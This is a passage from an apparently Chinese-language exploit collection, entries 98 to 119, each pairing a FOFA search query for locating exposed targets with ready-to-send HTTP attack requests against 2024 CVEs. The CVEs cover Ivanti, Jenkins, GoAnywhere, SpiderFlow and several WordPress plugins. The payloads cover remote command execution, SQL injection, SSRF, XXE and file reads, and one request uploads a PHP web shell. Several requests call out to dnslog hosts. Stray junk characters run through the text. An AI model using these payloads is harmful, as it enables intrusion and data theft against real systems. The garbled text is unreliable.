, r7 D& w' m8 D9 jUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15. n2 i* I9 V3 [* `" ~; G3 U
Accept-Encoding: gzip0 l3 w6 ~( p! P% V
Connection: close
: T& w0 l+ A, s; p# [Cookie: rememberMe=PAYLOAD
) q+ y' `/ o% [; sX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"0 d1 m1 q$ I$ B+ v

, _/ ~6 L+ @* O7 w
* F$ ^! M# q/ n5 w) {, @1 N. {* x98. SpiderFlow爬虫平台远程命令执行0 ^1 {7 o* N* J' |
CVE-2024-0195
+ M" Y. R- ?! {! `4 JFOFA:app="SpiderFlow"* t2 \& S- Z9 y; o1 p
POST /function/save HTTP/1.1
* ?! H3 J. N* ZHost: 192.168.40.130:8088% J8 l# S' `& l0 S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
6 j) Y$ P2 \& b& ^0 e4 @" PConnection: close
2 c- y3 E( T$ H5 a- _  [0 qContent-Length: 121
! q: J. t6 ?% p$ ?7 n' QAccept: */*7 Y0 P$ N9 d6 O: I( @7 u8 H
Accept-Encoding: gzip, deflate
4 a6 B. C/ q) ^Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* e! e& a" w- c  Z  Y
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
# g: P+ M; y  ~( v& _8 G& J2 R. _& lX-Requested-With: XMLHttpRequest# t2 W2 S$ ^, E

/ |: d/ y5 x% p' Aid=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B0 a0 \5 @: |* A% w" ]0 A, h! ]
/ e9 P3 Q2 l- r% E4 ^7 d6 P
( F) W: z+ d9 Q3 @
99. Ncast盈可视高清智能录播系统busiFacade RCE
! L. O4 x# A& f4 K3 |CVE-2024-0305
# g" e* }+ M! z& o  _( xFOFA:app="Ncast-产品" && title=="高清智能录播系统"
# e" J  f* Z' m5 u  tPOST /classes/common/busiFacade.php HTTP/1.1
& K8 @5 D9 M. t0 Y8 W  {Host: 192.168.40.130:8080, j9 g4 ^9 W6 N. M* Z9 s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0- k% `  G. L  @# v
Connection: close  J3 T" K0 \* E6 k) Z
Content-Length: 154
# \6 e* \" \( J4 q: MAccept: */*4 V( O$ K$ I9 {: G5 O" T/ b5 e
Accept-Encoding: gzip, deflate
  E) o! H0 @  K0 PAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 H+ E6 C) m0 F5 a& I( w
Content-Type: application/x-www-form-urlencoded; charset=UTF-8- m4 Q. ~" ]4 U% k
X-Requested-With: XMLHttpRequest
& b5 x( t7 K% u) B6 O) H2 g4 C# F5 j7 i' ]- ]. k
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
/ M/ ?* A8 S9 v  w8 I( J
* `8 ~/ W& R. ]2 a7 F& G& `% i
9 Q/ N' @: }( Q: ^$ I7 O# @100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传6 ]7 n" A6 S" B. N
CVE-2024-0352) b1 N+ L; S7 F# v) A; g% h. a
FOFA:icon_hash="874152924"
" \. ^6 S* p2 `1 C5 ?7 n8 o5 VPOST /api/file/formimage HTTP/1.1
- y$ l1 Y( u: j! Z" J1 FHost: 192.168.40.130: B/ m: A: o7 p2 `
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36, ~6 w! ^0 \1 J$ c  \
Connection: close8 x5 }) y7 Y- v% y, x7 v- M
Content-Length: 201
& j) X- D; b& ]# MContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
0 S0 Z: W4 ]0 z  V3 C  UAccept-Encoding: gzip
$ _* w& n. k# L. b1 r: T* b' z( a/ S7 G
------WebKitFormBoundarygcflwtei
0 P  n& Z4 C; p$ G; k* ZContent-Disposition: form-data; name="file";filename="IE4MGP.php"& C! s& Q$ }6 H# y) t/ m
Content-Type: application/x-php
$ \" E7 m4 n2 Z4 O
  B& n, v' g2 d5 e2ayyhRXiAsKXL8olvF5s4qqyI2O
2 x" C# j6 F' b6 D$ n& V& u% R------WebKitFormBoundarygcflwtei--1 }4 H( G# B) M6 q1 n
" x3 p" U% z  x5 E& N& K
7 m, c% m( q# m3 B
101. ivanti policy secure-22.6命令注入1 b. h1 i+ G. O) @/ d
CVE-2024-21887, ^. N' v8 p4 t; C
FOFA:body="welcome.cgi?p=logo"
( K% Q8 c6 ?* r& }. K: IGET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
: q5 B& X7 w  s& [* k$ Y# zHost: x.x.x.xx.x.x.x
/ S$ h4 O3 p6 FUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36  j! k( `" s3 Q7 }$ |. I. @
Connection: close
" E+ \8 z. ~1 tAccept-Encoding: gzip
" z$ Q. E6 Q9 G- J4 B  _% U5 P! T4 Y

, j% n9 e5 G+ X9 h102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行/ d8 J0 d* p; c; v  `
CVE-2024-21893
' L4 q$ f2 y% Q% M4 o6 [" O. _FOFA:body="welcome.cgi?p=logo"" |4 B* B1 J- P: Z
POST /dana-ws/saml20.ws HTTP/1.1, f3 I5 E& A, S9 f5 ^2 P) n& J
Host: x.x.x.x
4 }. S% S! p  O; AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
; Z, ?$ B0 E! p) P% a* ?$ SConnection: close
- ]* D2 B7 F& e' [. i+ |( aContent-Length: 792- F  H+ \' O) b1 ]( `& ?
Accept-Encoding: gzip+ S! K% J7 R! z( }$ s
5 ^* ~2 |* ?$ |4 J! D) A0 f8 c  T
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>& s' ~' l' I3 S8 g4 I1 x+ X$ n% L
# m$ m$ S: o  ]4 T0 P, m( M
103. Ivanti Pulse Connect Secure VPN XXE
9 w# n4 R5 E  |. w7 T5 QCVE-2024-22024, q& }& p- u9 w7 \9 \2 I! c
FOFA:body="welcome.cgi?p=logo"  [5 K! W$ p# S# D1 s
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
0 ]  k! ~6 p0 P. xHost: 192.168.40.130:111
' `7 O" j% G8 oUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
- m8 _2 D5 K9 N; LConnection: close
; F; B$ v; e5 |' u$ m0 ^5 sContent-Length: 204- c+ e0 R% a" K  u( G& v
Content-Type: application/x-www-form-urlencoded
; k; Z& D2 G9 i4 ^, h; S6 qAccept-Encoding: gzip
' C: D: x- {8 Q% u( E$ Y6 H( a' ^( Z5 L/ X& J  ^
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==' X  i0 d" D5 o0 m

5 F$ \9 I! [" e1 K1 A
+ R( ?- ~/ q. G) |, T; c( |其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
+ @8 ?' I; V$ n% e<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
: b: [& M4 a% x0 D4 Q- {* H% H3 C  h. @" m4 A# E% O
! |+ m9 b! @' e$ n5 h7 L
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
( s- H& Q4 Z) ECVE-2024-05693 f5 l/ f( |; D8 D% M$ T% ^
FOFA:title="TOTOLINK". X1 s) Q, V8 b
POST /cgi-bin/cstecgi.cgi HTTP/1.1. s; Z6 q$ f( P8 ^1 g8 ?+ p
Host:192.168.0.1
/ O, `# c8 G, P, v2 f% @/ Q0 e( ], P# XContent-Length:41
0 p8 r, K# p; ^# I4 NAccept:application/json,text/javascript,*/*;q=0.01/ n7 g3 W* D8 R" c! o
X-Requested-with: XMLHttpRequest
& M/ P+ f( A& j; XUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36' r. q7 U/ K/ V% G; i/ U- I
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
) V; Z1 S# L" [% u# ?6 W: \( Z% UOrigin: http://192.168.0.1
5 W+ ^; a4 b" T: ?% O8 @- J" RReferer: http://192.168.0.1/advance/index.html?time=1671152380564
% A; n" P1 u3 w5 ]Accept-Encoding:gzip,deflate
9 }2 K; V1 C: V1 D+ m- iAccept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7) q  C8 }+ j2 ?% E  m5 z$ [
Connection:close
  u( ~0 g9 g# v# C  g4 h6 ?7 C3 `! ?# b8 A" U8 o
{
0 l7 N/ N) ]* Q6 X5 K$ w"topicurl":"getSysStatusCfg",
# D% {: Z0 j* ]' a"token":"") u! q* K8 y1 L, k4 P) N
}
1 i5 D# M) u0 G! |0 c
# f: V: Q; q8 @/ H# w, @4 U0 C' |' E105. SpringBlade v3.2.0 export-user SQL 注入
" e) {8 |+ k& }2 i; y* D' hFOFA:body="https://bladex.vip"
/ D' J7 @* i5 f. i$ Zhttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
( \3 I7 B2 `0 Q" _9 S8 w
; z3 D, j9 x( d( p# z1 H106. SpringBlade dict-biz/list SQL 注入
7 X$ D0 C: H, z) a( TFOFA:body="Saber 将不能正常工作"
) a6 T# \5 ~% g4 Z6 w- a0 r8 @GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.16 ?) F' P3 |6 C0 r) @8 X( _
Host: your-ip& z: Z7 Y3 Y  P9 j5 p, L5 t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
! I/ U' r& }2 d0 @0 m5 Q9 j* jBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
# U) q& G1 w5 rAccept-Encoding: gzip, deflate1 T# z7 A, B. x5 c3 \
Accept-Language: zh-CN,zh;q=0.9
! |( t% I: o: y9 E. s. cConnection: close
: x% K; s( G" {. ^" v" v3 ?+ S) r( i- j( g* \2 I6 i) {
0 c+ t: d4 ?  B" r  ~9 ]
107. SpringBlade tenant/list SQL 注入  C$ b* t+ I! D$ l1 d' T( P
FOFA:body="https://bladex.vip"
; D1 W1 k/ u* i0 \' `! ], `GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1, n5 y: ]0 B3 f1 w1 u4 m
Host: your-ip
+ F+ s* W( c2 _5 l1 hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36. N2 Q. T& }- Y$ y
Blade-Auth:替换为自己的
7 H1 J! p0 Z' _: @  ~Connection: close8 T! n4 g. k5 t% S; m' \3 d
- U  V6 I% E/ ~' P

) ?  V' T8 Y9 m7 Q! T: B* o- g108. D-Tale 3.9.0 SSRF
- p& ^" o5 b0 j* w7 ZCVE-2024-21642
9 _2 J5 |" ~8 Y, B" fFOFA:"dtale/static/images/favicon.png"% d' C( x+ Y4 A
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
( f7 [6 \& I. e. U3 i) r" iHost: your-ip% g5 ^$ p' B$ P( ?0 _) A
Accept: application/json, text/plain, */*
1 O' ?+ J0 r" t7 g4 wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.367 j- v/ y/ R8 p; U, R
Accept-Encoding: gzip, deflate
& [4 }8 U( j1 u+ wAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
, u3 s% l  q& v) j  O  e1 |Connection: close5 V" s: Q1 b% F* z

- w( ~5 C- x# e( H1 e' W7 d& T
3 W8 j6 ?7 S5 j3 K% ~109. Jenkins CLI 任意文件读取
+ h5 Q$ L3 h" v8 L; {CVE-2024-238975 D/ I  A/ q0 \& Z4 h4 i
FOFA:header="X-Jenkins"+ c% a  B5 g+ \* |
POST /cli?remoting=false HTTP/1.1  L1 X) ]6 ~& S) J$ s' k# m
Host:- m( F4 l$ H  ~: |1 m1 Z0 s
Content-type: application/octet-stream
( B& ]. m0 z# @) x: J/ XSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e922 V, J2 f- |0 }" T5 D0 v0 Z" |  P
Side: upload
# ^8 R- D+ g7 F# lConnection: keep-alive/ ^* ?2 z* M( D9 b1 `: L1 \( G
Content-Length: 163) M  T. q( W- e( i1 l# i3 Y

1 i3 y! C4 G- Y6 v& Mb'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
8 p4 F( }+ M! `& K5 S# r; J% N, S$ z- w3 W5 Q0 K: E7 e/ L

, k' U; `1 ~+ e- s: I! p, OPOST /cli?remoting=false HTTP/1.1- M2 K8 u  K+ K( O8 R2 u7 u+ E* a
Host:
- v; r, x5 y$ q1 H, XSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
+ B% F3 }: F& u" o5 A  V( ]/ mdownload
: W- H0 Y) ^' @1 T, D& \4 c1 r+ X9 e# w& T6 zContent-Type: application/x-www-form-urlencoded% u; a4 e$ Y3 ]3 r
Content-Length: 0
9 b' [2 [2 P  D
) H! X, P6 X; k" r3 ^
% i% C* @/ m$ c9 z2 r4 h1 j" EERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin5 @1 Z7 l* u$ i  A' h1 N# W. L
java -jar jenkins-cli.jar help
5 c* F$ q3 r" A1 E6 |( w[COMMAND]
2 j8 C8 p, @3 i1 |+ Z+ d. YLists all the available commands or a detailed description of single command.9 `4 N7 r+ N: G" g
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)* {6 h. P5 |+ \* K9 T
2 A: |) o1 N1 p
0 K$ h! b" C/ m
110. Goanywhere MFT 未授权创建管理员
& a, V$ V8 d+ f4 F& [! @CVE-2024-0204" }0 h, d8 M5 S- n) _+ {
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"; b1 E- Y* i$ C, ]* y6 M" l4 D. |3 n
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
: l3 X& l/ S8 j2 x' ?: K- WHost: 192.168.40.130:8000- `6 Z2 ]+ i6 S( q4 x( _
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.361 x) o2 `5 p& q( _9 s! Q
Connection: close
. B; Q6 X$ v& P) E( Y) W3 s8 bAccept: */*
. [% |" x' f0 `0 sAccept-Language: en
/ b8 V2 F( l; h  hAccept-Encoding: gzip' H" H* f" p, _5 |: X2 W; k4 e

4 Q" w. H# H5 ]" J) E
6 a1 O) a% r) ]* E- H( u111. WordPress Plugin HTML5 Video Player SQL注入
. g' ]- b- D6 }/ yCVE-2024-1061
7 R0 p1 U$ e2 _" sFOFA:"wordpress" && body="html5-video-player"8 w; X4 ^5 h* ^$ g0 F$ s0 A# V
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
4 c; D  v4 s( E! f/ ~& S& J% L2 {6 {1 PHost: 192.168.40.130:112
' h: Y( z) M; x7 bUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36- U+ l; h0 w) G
Connection: close
' J/ t- O2 n; z, y  O2 a9 ]1 ], \' nAccept: */*8 b  S# D- E: N3 A
Accept-Language: en
2 L. d/ L9 d7 X, U; M- ]; `Accept-Encoding: gzip
1 u# {0 B+ D* ^: Z2 b" U' A) H% g
/ N+ A# k: e2 z- g. E1 r5 f$ |0 N2 l
112. WordPress Plugin NotificationX SQL 注入
: N" {8 B5 ^* \; ICVE-2024-1698- o. ]9 N  I) k, d% |$ i
FOFA:body="/wp-content/plugins/notificationx"% E9 }% b% a: M3 p2 C
POST /wp-json/notificationx/v1/analytics HTTP/1.11 x4 C0 Z2 n9 c
Host: {{Hostname}}( U) Y8 \" s7 o) `
Content-Type: application/json# [) Q. a! L7 ]9 ~$ c' |) O
* q9 Q- W, d+ J& K" `
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
1 Z: {6 S6 o5 j1 u* a! j* c% N8 a
7 C7 n7 H' e8 D
$ s/ @% v8 y" @& R113. WordPress Automatic 插件任意文件下载和SSRF
' H8 T; N# w( {, f1 a( ICVE-2024-279546 g. |7 F- v1 c. W6 ~  Z6 Z
FOFA:"/wp-content/plugins/wp-automatic"2 m% b$ U- F. c& T, j$ a/ }
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.19 E1 w2 V9 j+ \
Host: x.x.x.x$ f& I3 ~- `& I9 D3 j, K& |
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
& o  w5 e  T& @0 hConnection: close8 C& J1 R$ X% U$ p8 B
Accept: */*  w' k& o. {  K) I1 q4 f
Accept-Language: en
! s5 z& a. T4 G* UAccept-Encoding: gzip
& e% I; a3 L3 q' w- c, C6 Q
; b& M3 [) t. ^2 b: {+ n5 x* Z: m% |  C: Z
114. WordPress MasterStudy LMS插件 SQL注入
5 H9 _7 m5 q" S6 wFOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"( v* i0 _4 p7 x4 w) C
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
. k: K- O, j5 R9 V4 @' p9 bHost: your-ip7 I0 z6 t6 h' d7 q5 B- {
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36# M: b3 p( w/ I6 n# ?
Accept-Charset: utf-86 U" A$ C" a6 a* R
Accept-Encoding: gzip, deflate' E* _2 v( x/ y6 s' j
Connection: close: Q7 z) l3 E) m; p7 r7 s- V, H

' Q* U, c5 @+ f) g( T0 k9 P8 M; `7 i: u1 r- p8 V
115. WordPress Bricks Builder <= 1.9.6 RCE# M, U- G1 f* W1 P1 Z! \! P8 P
CVE-2024-25600
) z. a  ]' I) [& y, aFOFA: body="/wp-content/themes/bricks/"
: x% W3 h5 V! q8 V: z6 V第一步,获取网站的nonce值: i( Y; O* ^0 t4 v9 @0 S
GET / HTTP/1.1* g3 k3 s, K+ s# b7 o3 Q/ [8 G3 c* F
Host: x.x.x.x* @9 Y( Q8 [, E1 W( o
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
, Q( S6 \* I$ g& XConnection: close
0 N  c, y% c) Y0 m+ H  DAccept-Encoding: gzip4 a1 c8 c0 }$ g
- d$ D4 F1 c2 H
* A' R; E; U) U3 y/ `
第二步替换nonce值,执行命令3 w2 Q, |& A6 \  q# C: e2 c! e
POST /wp-json/bricks/v1/render_element HTTP/1.1
3 x- p) b( S2 T  {4 l% y: \0 THost: x.x.x.x; b9 H  o2 v* z$ R1 M
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.366 P0 w' J# p& X3 b( X0 |% c
Connection: close4 A# r+ @! Z8 Z! s
Content-Length: 356
& W6 V: L. e! K2 }: \Content-Type: application/json
$ C  L% u# q! @6 ^* R6 D" U5 zAccept-Encoding: gzip. U7 m4 Q# i# r$ h. O

5 l0 K% l7 v" h: a. x{
! d( S# ~( z; A9 D' K  }- H"postId": "1",
! r. w. e& c' l9 `# S  "nonce": "第一步获得的值",
: G- W+ ^- v( I* d  "element": {, y5 X7 V' A) ^# ?7 |9 E
    "name": "container",7 {$ O2 @, X& Q' |5 A) \' Z9 _  _
    "settings": {. z4 y- |+ |& S% r
      "hasLoop": "true",5 ]8 L9 w' C9 ?7 ?" ?9 L! i% |8 I9 ?
      "query": {# @& q& b" r6 m( u; v# D' \
        "useQueryEditor": true,
  H: z  Z2 V$ F3 i. |        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
6 i+ [: s9 d6 O  f7 _        "objectType": "post"  w! A4 c* D( h8 e  p1 [2 C# S
      }0 T8 m1 |0 R) e& C
    }. l* `( D. i& G/ N8 c
  }
3 c: f- |( E) E7 A3 ^}
. ^( }# X, b5 w) J$ @$ y* I% D- l
+ j5 \8 N* b1 q% o8 ]% C2 s
116. wordpress js-support-ticket文件上传& u$ A2 _$ v+ ]' M  d6 |6 {
FOFA:body="wp-content/plugins/js-support-ticket"
, n! I0 P3 H+ A" Z! p1 jPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.19 W( V" o( K3 p% W
Host:
2 @' E' B) N. C' A! pContent-Type: multipart/form-data; boundary=--------767099171
. `! f; i- J! {User-Agent: Mozilla/5.06 B1 G  M4 ?0 a( f/ y3 n

# A5 I. [* g0 i7 |# Q9 O7 Q----------767099171+ C# l- o- P0 C# P- S, T# x
Content-Disposition: form-data; name="action": o  t% r0 Q! r
configuration_saveconfiguration
) c' ^, ~' [, i1 W7 k----------767099171
  v; R6 b9 Y6 u  G* W; KContent-Disposition: form-data; name="form_request"! c- ~, ?/ g* Z2 c$ s) B6 z
jssupportticket
7 I3 `; j: B) W----------767099171- G) e8 ~1 d, v3 y" I
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php": K3 H( P0 z8 @* B0 d& w6 V: F; q' U
Content-Type: image/png, t- Y# u& c% g) a) ^+ ^) e
----------767099171--
0 {, a: F+ Y3 N0 m8 S6 C
" J! u8 `  m+ C, [1 O2 B6 Y) C% d3 {) e# s4 T
117. WordPress LayerSlider插件SQL注入
! }% H4 g+ }$ y! u6 A7 vversion:7.9.11 – 7.10.0. Q/ u# i  q) g
FOFA:body="/wp-content/plugins/LayerSlider/"
; ^& X- |" r( v8 }* ^  \4 YGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1* t  q' B/ R( U5 }
Host: your-ip
# ]# E* B8 p' T5 C( }! [4 mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
+ |$ C1 Y0 I8 e! a! q  rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
, d( {* ]0 \8 b# h* Q8 LAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, F: c2 a$ L2 c' u& D+ n: N: C
Accept-Encoding: gzip, deflate, br
  E: h) U" W- Y) [. ~  F' EConnection: close
$ h! ?* W5 o; y3 `. z* i# kUpgrade-Insecure-Requests: 1* [: c* r/ v! u! z

( u& u! d2 `# i1 R5 z/ u* a/ `$ X( T) `% M7 w9 z
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
4 e& x9 a/ c, y9 `  Y' j4 nCVE-2024-09398 m  X8 T+ k& M9 ]! d6 R, s9 b; P1 W
FOFA:title="Smart管理平台"
# p3 `' ]: g$ }. x( u) }POST /Tool/uploadfile.php? HTTP/1.1& y+ R* `2 X" P3 j/ V, E
Host: 192.168.40.130:8443
0 v: N" x+ H4 `% ]- ECookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8- {* u% k/ x3 a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
5 ?) `+ B- b" F3 x  ?( YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8% j- n' ^; \4 ~% z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( K; Z' g) A: V( h; OAccept-Encoding: gzip, deflate- s' M# X: @. n
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887+ M' c  f; t4 F7 g) Q2 j. C3 i
Content-Length: 4056 X2 J+ Q9 U8 j; |8 b5 \1 n
Origin: https://192.168.40.130:8443
/ e1 N" E$ S. M* v$ B3 WReferer: https://192.168.40.130:8443/Tool/uploadfile.php1 ]# ~( v; n% {! k
Upgrade-Insecure-Requests: 1
2 w( ~1 |/ n$ ]( t4 ~. mSec-Fetch-Dest: document
; A) }% m4 p4 a  E0 wSec-Fetch-Mode: navigate
% l7 V( B# a& ?' Z" B( H' NSec-Fetch-Site: same-origin
1 K( J4 F; S; ~: DSec-Fetch-User: ?1; T' o9 R( R8 J0 v7 b
Te: trailers4 ?6 L$ f, D% m+ W1 N
Connection: close% y( u: k- X. L! j0 u4 b
9 s, b: C2 u6 l, X8 {
-----------------------------13979701222747646634037182887
1 W! F% H" j/ F. P5 c2 ]1 r7 KContent-Disposition: form-data; name="file_upload"; filename="contents.php"
# j+ J7 {% e2 E. bContent-Type: application/octet-stream
# F6 O' a& F: L" k2 ]! D; Y, N0 A: M, P" `
<?php+ I3 H+ i- i5 P8 G; p. a9 {5 W! f! m
system($_POST["passwd"]);
. u# x  [4 L, Z?>
, P' C5 w7 g, x9 W-----------------------------13979701222747646634037182887, K$ _7 x  o$ O! Y+ z1 o! ]
Content-Disposition: form-data; name="txt_path"# ~  {; }, R( a  O5 E

3 ^3 a) P* [" S/ ?$ A/home/src.php% d1 u2 \4 P7 Y
-----------------------------13979701222747646634037182887--
: g/ Y9 Q" s3 C& R( W$ D3 e2 g' B3 b* t

, I0 U* @8 a8 d3 z, w访问/home/src.php
% H- y4 @+ l4 n  u3 E2 j# W0 v0 P. h7 E
119. 北京百绰智能S20后台sysmanageajax.php sql注入4 r6 Q2 }) @: y& J& G, F2 l0 F
CVE-2024-1254
9 V9 X. @; L- L$ WFOFA:title="Smart管理平台"
1 r: i) F, b6 ^( {1 R8 o先登录进入系统,默认账号密码为admin/admin8 W0 I6 L) H( p. }
POST /sysmanage/sysmanageajax.php HTTP/1.11$ K+ N. H/ Q8 b* t2 P
Host: x.x.x.x
